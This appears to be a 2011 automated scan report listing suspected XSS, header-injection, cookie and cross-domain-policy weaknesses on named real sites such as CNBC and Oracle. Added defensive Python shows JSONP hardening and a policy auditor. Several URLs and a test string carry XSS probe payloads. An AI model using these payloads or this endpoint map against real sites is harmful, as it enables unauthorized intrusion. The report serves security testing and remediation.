XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09062011-02

Report generated by XSS.CX at Tue Sep 06 16:07:58 GMT-06:00 2011.


1. Cross-site scripting (stored)

2. HTTP header injection

2.1. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 2]

2.2. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 3]

2.3. http://login.cnbc.com/tpauth/rest/authenticate [name of an arbitrarily supplied request parameter]

2.4. http://login.cnbc.com/tpauth/rest/authenticate [source parameter]

2.5. https://register.cnbc.com/memberCenter.do [name of an arbitrarily supplied request parameter]

2.6. https://register.cnbc.com/refreshlogin.jsp [name of an arbitrarily supplied request parameter]

2.7. https://register.cnbc.com/refreshlogin.jsp [source parameter]

2.8. https://register.cnbc.com/registerUser.do [name of an arbitrarily supplied request parameter]

3. Cross-site scripting (reflected)

3.1. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

3.2. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

3.3. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

3.4. http://ads.rnmd.net/getAds [adDiv parameter]

3.5. http://api-cdn.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]

3.6. http://api-public.addthis.com/url/shares.json [callback parameter]

3.7. http://api.bizographics.com/v1/profile.json [api_key parameter]

3.8. http://api.bizographics.com/v1/profile.json [callback parameter]

3.9. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

3.10. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

3.11. http://api.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]

3.12. http://api.cnbc.com/api/movers/movers.asp [chartType parameter]

3.13. http://api.cnbc.com/api/movers/movers.asp [rowCount parameter]

3.14. http://api.viglink.com/api/ping [jsonp parameter]

3.15. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.16. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.17. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.18. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.19. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.20. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.21. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.22. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.23. http://blog.harbottle.com/dm/index.php [name of an arbitrarily supplied request parameter]

3.24. http://blog.ulf-wendel.de/ [name of an arbitrarily supplied request parameter]

3.25. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

3.26. http://cdn.krxd.net/config/ [site parameter]

3.27. http://content.plymedia.com/initialize [video parameter]

3.28. http://d7.zedo.com/jsc/d3/fl.js [l parameter]

3.29. http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js [l parameter]

3.30. http://digg.com/submit [REST URL parameter 1]

3.31. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getCourseDesc [dc parameter]

3.32. http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_lang parameter]

3.33. http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_wddi_id parameter]

3.34. http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter]

3.35. http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter]

3.36. http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect [p_url parameter]

3.37. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter]

3.38. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter]

3.39. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

3.40. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

3.41. http://js.revsci.net/gateway/gw.js [csid parameter]

3.42. https://login.cnbc.com/cas/login [apphome parameter]

3.43. https://login.cnbc.com/cas/login [jsessionid parameter]

3.44. https://login.cnbc.com/cas/login [login_view parameter]

3.45. https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter]

3.46. https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter]

3.47. https://login.cnbc.com/cas/login [service parameter]

3.48. https://login.cnbc.com/cas/login [source parameter]

3.49. https://login.cnbc.com/cas/login [source_type parameter]

3.50. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]

3.51. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]

3.52. http://m.cnbc.com/ [name of an arbitrarily supplied request parameter]

3.53. http://m.cnbc.com/favicon.ico [REST URL parameter 1]

3.54. http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 1]

3.55. http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 2]

3.56. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard [mbox parameter]

3.57. http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter]

3.58. http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter]

3.59. http://ping.crowdscience.com/ping.js [m parameter]

3.60. http://pixel.adsafeprotected.com/jspix [anId parameter]

3.61. http://pixel.adsafeprotected.com/jspix [campId parameter]

3.62. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

3.63. http://pixel.adsafeprotected.com/jspix [pubId parameter]

3.64. http://quote.cnbc.com/quote-html-webservice/quote.htm [&symbols parameter]

3.65. http://search.cnbc.com/main.do [keywords parameter]

3.66. http://search.cnbc.com/main.do [keywords parameter]

3.67. http://search.cnbc.com/main.do [keywords parameter]

3.68. http://search.cnbc.com/main.do [keywords parameter]

3.69. http://search.cnbc.com/main.do [pubfreq parameter]

3.70. http://search.cnbc.com/main.do [pubfreq parameter]

3.71. http://search.cnbc.com/main.do [sort parameter]

3.72. http://search.cnbc.com/main.do [sort parameter]

3.73. http://serve.directdigitalllc.com/serve.php [click parameter]

3.74. http://serve.directdigitalllc.com/serve.php [name of an arbitrarily supplied request parameter]

3.75. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]

3.76. http://wd.sharethis.com/api/getCount2.php [cb parameter]

3.77. http://www.dove.us/Products/Hair/ [ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 parameter]

3.78. http://www.dove.us/Products/Hair/ [name of an arbitrarily supplied request parameter]

3.79. http://www.harbottle.com/hnl/pages/hnl_search2.php [name of an arbitrarily supplied request parameter]

3.80. http://www.harbottle.com/hnl/pages/hnl_search2.php [search parameter]

3.81. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4]

3.82. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4]

3.83. http://www.harbottle.com/hnl/pages/hnl_search2.php/a [REST URL parameter 4]

3.84. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5]

3.85. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5]

3.86. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5]

3.87. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5]

3.88. http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4]

3.89. http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4]

3.90. http://www.linkedin.com/countserv/count/share [url parameter]

3.91. http://www.sapient.com/en-us/search.html [search parameter]

3.92. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

3.93. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

3.94. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js [ruid cookie]

3.95. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js [ruid cookie]

3.96. http://optimized-by.rubiconproject.com/a/dk.html [ruid cookie]

3.97. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

3.98. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]

3.99. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_nr cookie]

3.100. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_vi cookie]
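Several of the reflected entries above sit on JSON endpoints whose flagged input is a `callback`, `jsonp` or `cb` parameter (3.6, 3.8, 3.14, 3.75, 3.76). The report does not show the responses, but the common root cause behind that class of finding is a JSONP handler that echoes the callback name into the response body unvalidated, often with a `text/html` content type. The block below is an added example, not the code of any endpoint listed: a constructed vulnerable handler next to a hardened one that restricts the callback to a JavaScript identifier, serves the result as JavaScript with `nosniff`, escapes angle brackets inside the JSON, and prefixes the body with `/**/` so that an alphanumeric callback cannot turn the response into a valid file of another type.

```python
"""JSONP callback handling: a reflected-XSS sink and its hardened form.

Added example. The handler, the sample data and the parameter values are
constructed; they are not taken from any endpoint named in the report.
"""
import json
import re

# A dotted JavaScript identifier such as jQuery18205_1315339200, cb or ns.handler.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$")
MAX_CALLBACK_LEN = 64

# Constructed response data; the title contains angle brackets on purpose.
SAMPLE = {"url": "http://example.test/article", "title": "Q&A <live>", "shares": 42}


def jsonp_vulnerable(callback):
    """Echoes the callback straight into the body and serves it as HTML, so
    a callback like </script><script>alert(1)</script> executes in the page."""
    body = f"{callback}({json.dumps(SAMPLE)});"
    return 200, {"Content-Type": "text/html"}, body


def jsonp_hardened(callback):
    """Accepts only identifier-shaped callbacks and serves real JavaScript."""
    if len(callback) > MAX_CALLBACK_LEN or not CALLBACK_RE.match(callback):
        return 400, {"Content-Type": "text/plain; charset=utf-8"}, "invalid callback"
    # Angle brackets are legal inside JSON strings; escaping them removes the
    # last characters an HTML parser could latch onto if the type were ignored.
    payload = json.dumps(SAMPLE).replace("<", "\\u003c").replace(">", "\\u003e")
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    # Leading comment: the response can never begin with attacker-chosen bytes.
    return 200, headers, f"/**/{callback}({payload});"


if __name__ == "__main__":
    for cb in ("jQuery18205_1315339200", "ns.handler", "</script><script>alert(1)</script>"):
        status, headers, body = jsonp_hardened(cb)
        print(status, headers["Content-Type"], body[:60])
```

The identifier allowlist is the control that removes the sink; the content type, `nosniff` and the `/**/` prefix are defence in depth for clients that would otherwise sniff or reinterpret the response. Note that the entries reflected from the `Referer` header or from cookies (3.92 to 3.100) are a different case: they only become exploitable if the attacker can control that header or cookie, which is why the "cookie scoped to parent domain" findings in section 12 on the same hosts are worth reading alongside them.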

4. Flash cross-domain policy

4.1. http://a.tribalfusion.com/crossdomain.xml

4.2. http://a1.interclick.com/crossdomain.xml

4.3. http://action.mathtag.com/crossdomain.xml

4.4. http://ad.doubleclick.net/crossdomain.xml

4.5. http://admin.brightcove.com/crossdomain.xml

4.6. http://ads.pointroll.com/crossdomain.xml

4.7. http://ads.rnmd.net/crossdomain.xml

4.8. http://afe.specificclick.net/crossdomain.xml

4.9. http://ajax.googleapis.com/crossdomain.xml

4.10. http://altfarm.mediaplex.com/crossdomain.xml

4.11. http://at.amgdgt.com/crossdomain.xml

4.12. http://b.scorecardresearch.com/crossdomain.xml

4.13. http://c.betrad.com/crossdomain.xml

4.14. http://c.brightcove.com/crossdomain.xml

4.15. http://cache.specificmedia.com/crossdomain.xml

4.16. http://cdn.gigya.com/crossdomain.xml

4.17. http://cdn5.tribalfusion.com/crossdomain.xml

4.18. http://clk.fetchback.com/crossdomain.xml

4.19. http://content.links.channelintelligence.com/crossdomain.xml

4.20. http://content.plymedia.com/crossdomain.xml

4.21. http://core.insightexpressai.com/crossdomain.xml

4.22. http://d.adroll.com/crossdomain.xml

4.23. http://d.ads.readwriteweb.com/crossdomain.xml

4.24. http://d1.openx.org/crossdomain.xml

4.25. http://d7.zedo.com/crossdomain.xml

4.26. http://fls.doubleclick.net/crossdomain.xml

4.27. http://goku.brightcove.com/crossdomain.xml

4.28. http://gscounters.gigya.com/crossdomain.xml

4.29. http://ib.adnxs.com/crossdomain.xml

4.30. http://img-cdn.mediaplex.com/crossdomain.xml

4.31. http://imp.fetchback.com/crossdomain.xml

4.32. http://intelligence.marykay.com/crossdomain.xml

4.33. http://js.revsci.net/crossdomain.xml

4.34. http://l.betrad.com/crossdomain.xml

4.35. http://load.tubemogul.com/crossdomain.xml

4.36. http://log30.doubleverify.com/crossdomain.xml

4.37. http://netsuite.tt.omtrdc.net/crossdomain.xml

4.38. http://network.realmedia.com/crossdomain.xml

4.39. http://now.eloqua.com/crossdomain.xml

4.40. http://oimg.m.cnbc.com/crossdomain.xml

4.41. http://oimg.nbcuni.com/crossdomain.xml

4.42. http://omni.csc.com/crossdomain.xml

4.43. http://oracle.112.2o7.net/crossdomain.xml

4.44. http://oracleglobal.112.2o7.net/crossdomain.xml

4.45. http://oracleuniversity.112.2o7.net/crossdomain.xml

4.46. http://p.brilig.com/crossdomain.xml

4.47. http://pg.links.channelintelligence.com/crossdomain.xml

4.48. http://pg.links.origin.channelintelligence.com/crossdomain.xml

4.49. http://ping.crowdscience.com/crossdomain.xml

4.50. http://pix04.revsci.net/crossdomain.xml

4.51. http://pixel.adsafeprotected.com/crossdomain.xml

4.52. http://pixel.everesttech.net/crossdomain.xml

4.53. http://pixel.fetchback.com/crossdomain.xml

4.54. http://pixel.mathtag.com/crossdomain.xml

4.55. http://pixel.quantserve.com/crossdomain.xml

4.56. http://pro.cnbc.com/crossdomain.xml

4.57. http://r.casalemedia.com/crossdomain.xml

4.58. http://rcv-srv03.inplay.tubemogul.com/crossdomain.xml

4.59. http://receive.inplay.tubemogul.com/crossdomain.xml

4.60. http://reviews.gillettevenus.com/crossdomain.xml

4.61. http://s0.2mdn.net/crossdomain.xml

4.62. http://search.twitter.com/crossdomain.xml

4.63. http://secure-us.imrworldwide.com/crossdomain.xml

4.64. http://services.plymedia.com/crossdomain.xml

4.65. http://speed.pointroll.com/crossdomain.xml

4.66. http://static.plymedia.com/crossdomain.xml

4.67. http://static.plymedia.com.s3.amazonaws.com/crossdomain.xml

4.68. http://stats.deloitte.com/crossdomain.xml

4.69. http://statse.webtrendslive.com/crossdomain.xml

4.70. http://tags.bluekai.com/crossdomain.xml

4.71. http://tf.nexac.com/crossdomain.xml

4.72. http://ttwbs.channelintelligence.com/crossdomain.xml

4.73. http://wingateweb.112.2o7.net/crossdomain.xml

4.74. http://ad.wsod.com/crossdomain.xml

4.75. http://adadvisor.net/crossdomain.xml

4.76. http://ads.adsonar.com/crossdomain.xml

4.77. http://ads1.msn.com/crossdomain.xml

4.78. http://adx.g.doubleclick.net/crossdomain.xml

4.79. http://assets1.csc.com/crossdomain.xml

4.80. http://blogs.oracle.com/crossdomain.xml

4.81. http://bstats.adbrite.com/crossdomain.xml

4.82. http://channelsun.sun.com/crossdomain.xml

4.83. https://cms.paypal.com/crossdomain.xml

4.84. http://cnbc.com/crossdomain.xml

4.85. http://cvs.shoplocal.com/crossdomain.xml

4.86. http://data.cnbc.com/crossdomain.xml

4.87. http://developers.facebook.com/crossdomain.xml

4.88. http://disqus.com/crossdomain.xml

4.89. http://edge.sapient.com/crossdomain.xml

4.90. http://event.on24.com/crossdomain.xml

4.91. https://event.on24.com/crossdomain.xml

4.92. http://executivevision.cnbc.com/crossdomain.xml

4.93. http://js.adsonar.com/crossdomain.xml

4.94. http://login.cnbc.com/crossdomain.xml

4.95. https://login.cnbc.com/crossdomain.xml

4.96. http://m.cnbc.com/crossdomain.xml

4.97. http://media.cnbc.com/crossdomain.xml

4.98. http://msnbcmedia.msn.com/crossdomain.xml

4.99. http://optimized-by.rubiconproject.com/crossdomain.xml

4.100. http://pagead2.googlesyndication.com/crossdomain.xml

4.101. http://pi.pardot.com/crossdomain.xml

4.102. http://quote.cnbc.com/crossdomain.xml

4.103. http://rd.rlcdn.com/crossdomain.xml

4.104. http://search.cnbc.com/crossdomain.xml

4.105. http://server.iad.liveperson.net/crossdomain.xml

4.106. http://snas.nbcuni.com/crossdomain.xml

4.107. https://support.oracle.com/crossdomain.xml

4.108. http://symlookup.cnbc.com/crossdomain.xml

4.109. http://videometa.cnbc.com/crossdomain.xml

4.110. http://w.sharethis.com/crossdomain.xml

4.111. http://wd.sharethis.com/crossdomain.xml

4.112. http://www.apture.com/crossdomain.xml

4.113. http://www.atg.com/crossdomain.xml

4.114. https://www.atg.com/crossdomain.xml

4.115. http://www.cnbc.com/crossdomain.xml

4.116. http://www.csc.com/crossdomain.xml

4.117. http://www.deloitte.com/crossdomain.xml

4.118. http://www.facebook.com/crossdomain.xml

4.119. http://www.fetchback.com/crossdomain.xml

4.120. http://www.marykay.com/crossdomain.xml

4.121. http://www.msnbc.msn.com/crossdomain.xml

4.122. http://www.oracle.com/crossdomain.xml

4.123. http://www.oracleimg.com/crossdomain.xml

4.124. http://www.sapient.com/crossdomain.xml

4.125. http://www.youtube.com/crossdomain.xml

4.126. http://www2.znode.com/crossdomain.xml

4.127. http://1215.ic-live.com/crossdomain.xml

4.128. http://admin5.testandtarget.omniture.com/crossdomain.xml

4.129. http://api.twitter.com/crossdomain.xml

4.130. https://docs.google.com/crossdomain.xml

4.131. http://search.oracle.com/crossdomain.xml

4.132. http://sophelle.app5.hubspot.com/crossdomain.xml

4.133. http://sun.edgeboss.net/crossdomain.xml

4.134. http://twitter.com/crossdomain.xml

4.135. http://www.covergirl.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

5.2. http://ads.pointroll.com/clientaccesspolicy.xml

5.3. http://ads1.msn.com/clientaccesspolicy.xml

5.4. http://b.scorecardresearch.com/clientaccesspolicy.xml

5.5. http://intelligence.marykay.com/clientaccesspolicy.xml

5.6. http://oimg.m.cnbc.com/clientaccesspolicy.xml

5.7. http://oimg.nbcuni.com/clientaccesspolicy.xml

5.8. http://omni.csc.com/clientaccesspolicy.xml

5.9. http://oracle.112.2o7.net/clientaccesspolicy.xml

5.10. http://oracleglobal.112.2o7.net/clientaccesspolicy.xml

5.11. http://oracleuniversity.112.2o7.net/clientaccesspolicy.xml

5.12. http://pixel.quantserve.com/clientaccesspolicy.xml

5.13. http://s0.2mdn.net/clientaccesspolicy.xml

5.14. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

5.15. http://speed.pointroll.com/clientaccesspolicy.xml

5.16. http://stats.deloitte.com/clientaccesspolicy.xml

5.17. http://wingateweb.112.2o7.net/clientaccesspolicy.xml

5.18. http://cnbc.com/clientaccesspolicy.xml

5.19. http://cvs.shoplocal.com/clientaccesspolicy.xml

5.20. http://executivevision.cnbc.com/clientaccesspolicy.xml

5.21. http://media.cnbc.com/clientaccesspolicy.xml

5.22. http://msnbcmedia.msn.com/clientaccesspolicy.xml

5.23. http://www.cnbc.com/clientaccesspolicy.xml
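Sections 4 and 5 list every `crossdomain.xml` and `clientaccesspolicy.xml` the crawler found, not their contents, so the list alone does not say which policies are permissive. The question to ask of each one is whether it grants arbitrary origins credentialed read access: a Flash policy with `allow-access-from domain="*"` (or `secure="false"` on an HTTPS host) and a Silverlight policy with `<domain uri="*"/>` over `<resource path="/" include-subpaths="true"/>` are the cross-domain equivalent of CORS with a wildcard origin plus credentials. On a pure ad or beacon host that is usually harmless; on a host that also serves authenticated content it is a data-exposure issue. The following added example, not code from the report or from any listed site, audits both file formats against constructed policy documents:

```python
"""Audit Flash (crossdomain.xml) and Silverlight (clientaccesspolicy.xml) policies.

Added example. The three policy documents below are constructed for the demo
and were not fetched from any host named in the report.
"""
import xml.etree.ElementTree as ET

PERMISSIVE_FLASH = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

RESTRICTED_FLASH = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="player.example.test" secure="true"/>
</cross-domain-policy>"""

PERMISSIVE_SILVERLIGHT = """<?xml version="1.0"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>"""


def audit_flash_policy(xml_text):
    """Return a list of findings for a crossdomain.xml document."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    if root.tag != "cross-domain-policy":
        return ["not a crossdomain.xml document"]
    findings = []
    for control in root.findall("site-control"):
        if control.get("permitted-cross-domain-policies", "").lower() == "all":
            findings.append("site-control permits arbitrary policy files (all)")
    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            findings.append('allow-access-from domain="*" grants every origin')
        elif domain.startswith("*."):
            findings.append(f"allow-access-from wildcard subdomain {domain}")
        # secure defaults to true when the policy is served over HTTPS;
        # an explicit false lets http:// SWFs read https:// responses.
        if rule.get("secure", "true").lower() == "false":
            findings.append('allow-access-from secure="false" on an HTTPS host')
    for hdr in root.findall("allow-http-request-headers-from"):
        if hdr.get("domain") == "*" and hdr.get("headers") == "*":
            findings.append("any origin may send any request header")
    return findings


def audit_silverlight_policy(xml_text):
    """Return a list of findings for a clientaccesspolicy.xml document."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    if root.tag != "access-policy":
        return ["not a clientaccesspolicy.xml document"]
    findings = []
    for policy in root.iter("policy"):
        wildcard = any(d.get("uri") == "*" for d in policy.iter("domain"))
        whole_site = any(
            r.get("path") == "/" and r.get("include-subpaths", "false").lower() == "true"
            for r in policy.iter("resource")
        )
        if wildcard and whole_site:
            findings.append("policy grants every origin access to the whole site")
        elif wildcard:
            findings.append('policy allows domain uri="*"')
        for allow in policy.iter("allow-from"):
            if allow.get("http-request-headers") == "*":
                findings.append("allow-from permits arbitrary request headers")
    return findings


if __name__ == "__main__":
    print("flash/permissive:", audit_flash_policy(PERMISSIVE_FLASH))
    print("flash/restricted:", audit_flash_policy(RESTRICTED_FLASH))
    print("silverlight/permissive:", audit_silverlight_policy(PERMISSIVE_SILVERLIGHT))
```

To use it against a live host, fetch `/crossdomain.xml` and `/clientaccesspolicy.xml` yourself and pass the body in; the functions deliberately do no network I/O. Treat a wildcard on a host that sets session cookies (the list above includes login and support hosts) as the one to escalate.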

6. Cleartext submission of password

6.1. http://digg.com/submit

6.2. http://www.bigcommerce.com/freetrial.php

6.3. http://www.oraclecfo.com/Authentication/Login_w.html

6.4. http://www.oraclecfo.com/Main/Home/Home_w.html

6.5. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html

6.6. http://www.shopify.com/login

7. SSL cookie without secure flag set

7.1. https://forums.oracle.com/forums/adfAuthentication

7.2. https://forums.oracle.com/forums/category.jspa

7.3. https://forums.oracle.com/forums/guestsettings!default.jspa

7.4. https://forums.oracle.com/forums/index.jspa

7.5. https://forums.oracle.com/forums/login!withRedirect.jspa

7.6. https://forums.oracle.com/forums/main.jspa

7.7. https://register.cnbc.com/forgotPassword.do

7.8. https://register.cnbc.com/memberCenter.do

7.9. https://register.cnbc.com/registerUser.do

7.10. https://login.cnbc.com/cas/logout

7.11. https://login.oracle.com/favicon.ico

7.12. https://login.oracle.com/mysso/signon.jsp

7.13. https://login.oracle.com/mysso/sso_loginui/b-bg.gif

7.14. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif

7.15. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif

7.16. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif

7.17. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif

7.18. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif

7.19. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif

7.20. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif

7.21. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif

7.22. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif

7.23. https://login.oracle.com/mysso/sso_loginui/loginStyling.css

7.24. https://login.oracle.com/mysso/sso_loginui/moc_lib.js

7.25. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif

7.26. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif

7.27. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif

7.28. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif

7.29. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif

7.30. https://login.oracle.com/mysso/sso_loginui/sso_check.js

7.31. https://login.oracle.com/mysso/sso_loginui/t-bg.gif

7.32. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif

7.33. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif

7.34. https://login.oracle.com/oam/server/sso/auth_cred_submit

7.35. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

7.36. https://register.cnbc.com/

7.37. https://register.cnbc.com/RandomImage.jsp

7.38. https://register.cnbc.com/cas

7.39. https://register.cnbc.com/checkemail.do

7.40. https://register.cnbc.com/checkpassword.do

7.41. https://register.cnbc.com/checkscreenname.do

7.42. https://register.cnbc.com/checkzipcode.do

7.43. https://register.cnbc.com/createUser.do

7.44. https://register.cnbc.com/css/forgotPassword.css

7.45. https://register.cnbc.com/css/member_center_sytles.css

7.46. https://register.cnbc.com/css/newRegistration.css

7.47. https://register.cnbc.com/css/registration.css

7.48. https://register.cnbc.com/email/EmailSupport.jsp

7.49. https://register.cnbc.com/favicon.ico

7.50. https://register.cnbc.com/forgotPassword1.do

7.51. https://register.cnbc.com/forgotpassword1.jsp

7.52. https://register.cnbc.com/images/clickToContinue.gif

7.53. https://register.cnbc.com/images/loaderImage.gif

7.54. https://register.cnbc.com/images/memberCenterHeader.jpg

7.55. https://register.cnbc.com/images/submitPreferences.jpg

7.56. https://register.cnbc.com/images/tick.jpg

7.57. https://register.cnbc.com/images/tile_02.gif

7.58. https://register.cnbc.com/images/wrong.jpg

7.59. https://register.cnbc.com/js/membercenter.js

7.60. https://register.cnbc.com/js/prototype_ajax.js

7.61. https://register.cnbc.com/js/registrationBasic.js

7.62. https://register.cnbc.com/js/registrationUtils.js

7.63. https://register.cnbc.com/js/registrationValidations.js

7.64. https://register.cnbc.com/js/s_code.js

7.65. https://register.cnbc.com/js/validation.js

7.66. https://register.cnbc.com/quote-html-webservice/fvquote.htm

7.67. https://register.cnbc.com/quote-html-webservice/quote.htm

7.68. https://register.cnbc.com/refreshlogin.jsp

8. Session token in URL

8.1. http://blogs.oracle.com/roller-ui/cwpLogin.jsp

8.2. https://forums.oracle.com/forums/category.jspa

8.3. https://forums.oracle.com/forums/main.jspa

8.4. https://forums.oracle.com/forums/style/style.jsp

8.5. https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg

8.6. https://forums.oracle.com/forums/themes/english/resources/info_company.gif

8.7. https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif

8.8. https://forums.oracle.com/forums/themes/english/resources/otn_new.css

8.9. https://forums.oracle.com/forums/themes/english/resources/s_code.js

8.10. https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js

8.11. https://forums.oracle.com/forums/themes/english/resources/spacer.gif

8.12. https://forums.oracle.com/forums/themes/english/resources/style.css

8.13. http://l.sharethis.com/pview

8.14. https://login.cnbc.com/cas/login

8.15. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

8.16. https://myprofile.oracle.com/EndUser/adf/images/sibusy.gif

8.17. https://myprofile.oracle.com/EndUser/adf/images/siready.gif

8.18. https://myprofile.oracle.com/EndUser/adf/images/t.gif

8.19. https://myprofile.oracle.com/EndUser/adf/jsLibs/Common1_2_12_1.js

8.20. https://myprofile.oracle.com/EndUser/adf/styles/cache/profile-desktop-6nkike-en-ltr-webkit-cmp.css

8.21. https://myprofile.oracle.com/EndUser/images/fading-background.png

8.22. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

8.23. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

8.24. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js

8.25. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

8.26. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js

8.27. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard

8.28. http://www.apture.com/js/apture.js

8.29. http://www.atg.com/

8.30. http://www.atg.com/en/solutions/

8.31. http://www.atg.com/service/main.jsp

8.32. http://www.atg.com/service/main.jsp

8.33. https://www.atg.com/en/customers/listing/

8.34. https://www.atg.com/en/password/request/

8.35. https://www.atg.com/en/register/

8.36. https://www.atg.com/service/main.jsp

8.37. http://www.facebook.com/extern/login_status.php

8.38. http://www.google.com/search

8.39. http://www.oracle.com/us/technologies/virtualization/index.html

8.40. http://www.oracle.com/webapps/dialogue/dlgpage.jsp

8.41. http://www.readwriteweb.com/%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22

8.42. http://www.readwriteweb.com/404.html

9. SSL certificate

9.1. https://account.bigcommerce.com/

9.2. https://myshopify.com/

9.3. https://support.bigcommerce.com/

9.4. https://www.bigcommerce.com/

9.5. https://bugzilla.mozilla.org/

9.6. https://cms.paypal.com/

